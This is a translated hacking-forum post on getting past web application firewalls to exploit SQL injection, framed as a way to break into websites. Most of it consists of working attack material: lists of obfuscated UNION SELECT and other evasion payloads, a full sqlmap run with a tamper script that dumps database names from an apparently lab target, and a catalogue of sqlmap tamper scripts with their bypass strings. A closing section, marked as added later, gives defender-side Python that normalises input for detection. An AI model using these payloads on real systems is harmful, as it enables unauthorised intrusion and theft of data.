Kullanıcı1233 (Senior Member), 19 Jul 2011
WAF stands for Web Application Firewall.
If you want to get into a website's system, you first have to look for vulnerabilities in its web applications.
So, what are the types of these vulnerabilities?
- SQL Injection
- XSS (Cross-Site Scripting)
- LFI/RFI (Local File Inclusion / Remote File Inclusion)
- Command Injection
- Code Execution and others
But a WAF can block attempts to exploit these vulnerabilities, so sometimes the filter itself has to be bypassed.
UNION SELECT BYPASS METHODS
+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN/*&a=*/SeLeCT/*&a=*/
+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
CONCAT BYPASS METHODS
group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22B3yaz%22%29
g%72oup_c%6Fncat%28%76%65rsion%28%29%2C%22B3yaz%22%29
group_concat%28version%28%29%2C%22B3yaz%22%29
CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/
concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
LIMIT BYPASS METHODS
+LIMIT+0,1
+where+id+=1
WHERE ID_Produit='26 -- -
+having+id+=1
+and length((select password from users having substr(pass,1,1)=a'))
NULL PARAMETER BYPASS METHODS
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
=1=1
+And+1=0
/*!and*/+1=0
COLUMN BYPASS METHODS
Having+1=1
+and=0+
+div+0+
replace ' = %23
where 1=1
TABLE BYPASS METHOD
(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
HEX/UNHEX BYPASS METHODS
unhex(hex(value))
convert(database() using latin1)
cast(value as char)
uncompress(compress(version()))
cast(value as char)
aes_decrypt(aes_encrypt(value,1),1)
binary(value)
convert()
You can try to trigger an error message by appending the appropriate one of these to the URL.
Alternatively, we can use SQLMap's "Tamper Script" feature.
To demonstrate:
In the following test, SQLMap had first been run with its default parameters against a system protected by a WAF and produced no result. Below is the same run with a tamper script added:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "tamper/randomcase.py" --dbs
[*] starting at 16:16:24
[16:16:24] [INFO] loading tamper script 'randomcase'
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter 'id' is dynamic
[16:16:26] [WARNING] GET parameter 'id' appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset 'ascii'
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter 'id'
[16:16:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Surname: admin')
[16:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:16:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:16:37] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3106=3106&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)&Submit=Submit
---
[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:
[*] beyazsapka
[*] dvwa
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.127'
[*] shutting down at 16:16:41
As you can see, the protective mechanism on the target system has been bypassed.
There are several bypass scripts in the "tamper" folder of SQLMap's directory. In the test above we used the "randomcase.py" script from that folder. It sends SQL keywords such as UNION to the target with their letters in random upper and lower case, which is how the WAF was bypassed.
Now let's list the other bypass scripts, with their methods and platforms.
apostrophemask.py (UTF-8)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
apostrophenullencode.py (unicode)
Example:
* Original Command: AND '1'='1'
* Bypass Command: AND %271%27=%271%27
appendnullbyte.py ()
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1
Platform:
* Microsoft Access
base64encode.py (base64)
Example:
* Original Command: 1' AND SLEEP(5)#
* Bypass Command: MScgQU5EIFNMRUVQKDUpIw==
between.py (not between >)
Example:
* Original Command: 'A > B'
* Bypass Command: 'A NOT BETWEEN 0 AND B'
bluecoat.py (like =)
Example:
* Original Command: SELECT id FROM users where id = 1
* Bypass Command: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS
chardoubleencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode.py
Example:
* Original Command: SELECT FIELD FROM%20TABLE
* Bypass Command: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode.py
Example:
* Original Command: SELECT FIELD%20FROM TABLE
* Bypass Command: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045
Platform:
* ASP
* ASP.NET
equaltolike.py (like =)
Example:
* Original Command: SELECT * FROM users WHERE id=1
* Bypass Command: SELECT * FROM users WHERE id LIKE 1
halfversionedmorekeywords.py
Example:
* Original Command: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Command: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1
ifnull2ifisnull.py (IF(ISNULL(A), B, A) IFNULL(A, B))
Example:
* Original Command: IFNULL(1, 2)
* Bypass Command: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
modsecurityversioned.py
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!30000AND 2>1*/--
Platform:
* MySQL
modsecurityzeroversioned.py (0000)
Example:
* Original Command: 1 AND 2>1--
* Bypass Command: 1 /*!00000AND 2>1*/--
Platform:
* MySQL
multiplespaces.py
Example:
* Original Command: UNION SELECT
* Bypass Command: UNION SELECT
nonrecursivereplacement.py
Example:
* Original Command: 1 UNION SELECT 2--
* Bypass Command: 1 UNUNIONION SELSELECTECT 2--
percentage.py (%)
Example:
* Original Command: SELECT FIELD FROM TABLE
* Bypass Command: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP
randomcase.py
Example:
* Original Command: INSERT
* Bypass Command: InsERt
randomcomments.py
Example:
* Original Command: INSERT
* Bypass Command: IN/**/S/**/ERT
securesphere.py
Example:
* Original Command: AND 1=1
* Bypass Command: AND 1=1 and '0having'='0having'
sp_password.py (sp_password)
Example:
* Original Command: 1 AND 9227=9227--
* Bypass Command: 1 AND 9227=9227--sp_password
Platform:
* MSSQL
space2comment.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT/**/id/**/FROM/**/users
space2dash.py (--)
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite
space2hash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL
space2morehash.py
Platform:
* MySQL >= 5.1.13
space2mssqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server
space2mssqlhash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL
space2mysqlblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL
space2mysqldash.py
Example:
* Original Command: 1 AND 9227=9227
* Bypass Command: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL
space2plus.py (+)
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECT+id+FROM+users
space2randomblank.py
Example:
* Original Command: SELECT id FROM users
* Bypass Command: SELECTridtFROMnusers
unionalltounion.py (union all union)
Example:
* Original Command: -1 UNION ALL SELECT
* Bypass Command: -1 UNION SELECT
unmagicquotes.py (%bf%27 --)
Example:
* Original Command: 1' AND 1=1
* Bypass Command: 1%bf%27 AND 1=1--%20
versionedkeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL
versionedmorekeywords.py
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Command: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13
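Every evasion in the two lists above works against a filter that matches the raw parameter value: random keyword case, inline and versioned comments, single or double URL encoding, %u encoding, full-width look-alike characters and unusual whitespace bytes. The following Python is added here as a defender-side illustration and is neither part of the original post nor sqlmap's own code: it canonicalises a value before matching, so those forms collapse to one, and contrasts that with the naive rule such tricks are written against. The signature names, the `normalize`/`detect` functions and the sample values are all constructed for this example.

```python
"""Canonicalise a request parameter the way a WAF must before matching it."""
import re
import unicodedata
from urllib.parse import unquote_to_bytes

_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")        # IIS-style %u0053
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)         # /*!50000body*/: MySQL runs the body
_PLAIN_COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)     # /*body*/: MySQL ignores the body


def _decode_once(s: str) -> str:
    """One layer of form decoding: + to space, %uXXXX and %XX to characters."""
    s = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    raw = unquote_to_bytes(s.replace("+", " "))
    try:
        return raw.decode("utf-8")      # e.g. %EF%BC%87 -> U+FF07 FULLWIDTH APOSTROPHE
    except UnicodeDecodeError:
        return raw.decode("latin-1")    # lone high bytes such as %A0 or %BF stay one char each


def normalize(value: str, max_rounds: int = 3) -> str:
    """Return the canonical, lower-cased form of a parameter value."""
    s = value
    for _ in range(max_rounds):         # bounded: %2553 needs two rounds, %255253 three
        decoded = _decode_once(s)
        if decoded == s:
            break
        s = decoded
    s = unicodedata.normalize("NFKC", s)  # full-width apostrophe -> ', NBSP -> space
    s = _VERSIONED.sub(r" \1 ", s)        # keep the executed body, drop the markers
    # Plain comments are dropped outright rather than replaced by a space, so a
    # keyword split by comments (IN/**/S/**/ERT) rejoins; this over-approximates
    # on purpose, which is the right direction for a detection rule.
    s = _PLAIN_COMMENT.sub("", s)
    s = re.sub(r"\s+", " ", s).strip()    # \s covers %09 %0A %0B %0C %0D and NBSP
    return s.lower()


# Constructed signatures, checked against the normalised value. Whitespace between
# UNION and SELECT is optional because comment stripping may have glued them.
SIGNATURES = {
    "union_select": re.compile(r"union\s*(?:all|distinct(?:row)?)?\s*select"),
    "select_from": re.compile(r"\bselect\b.*\bfrom\b"),
    "insert": re.compile(r"\binsert\b"),
    "quoted_tautology": re.compile(r"'\s*(\w+)\s*'\s*=\s*'\s*\1\s*'"),
}

# The kind of rule the evasions above are written against: raw value,
# case-sensitive, blind to comments and to extra encoding layers.
_NAIVE_RULE = re.compile(r"UNION\s+SELECT")


def naive_matches(value: str) -> bool:
    return bool(_NAIVE_RULE.search(value))


def detect(value: str) -> list:
    """Names of the signatures that fire on the normalised value (sorted)."""
    canon = normalize(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(canon))


if __name__ == "__main__":
    # Constructed samples built from the evasion forms listed on this page.
    samples = [
        "1+%2F**%2Funion%2F**%2Fselect+1,2",
        "+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D",
        "1 UnIoN SeLeCt 1,2",
        "AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87",
        "%2553%2545%254c%2545%2543%2554 FIELD FROM TABLE",
        "IN/**/S/**/ERT",
        "42",
    ]
    for v in samples:
        print(f"{v!r:60} naive={naive_matches(v)!s:5} -> {normalize(v)!r} {detect(v)}")
```

Normalisation narrows the gap between what the filter sees and what the database executes, but the durable fix for the injection itself is parameterised queries in the application.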
Original: https://www.turkhackteam.org/web-server-guvenligi/1177884-waf-nedir-waf-bypass-giris-gensu.html
Translator: R4V3N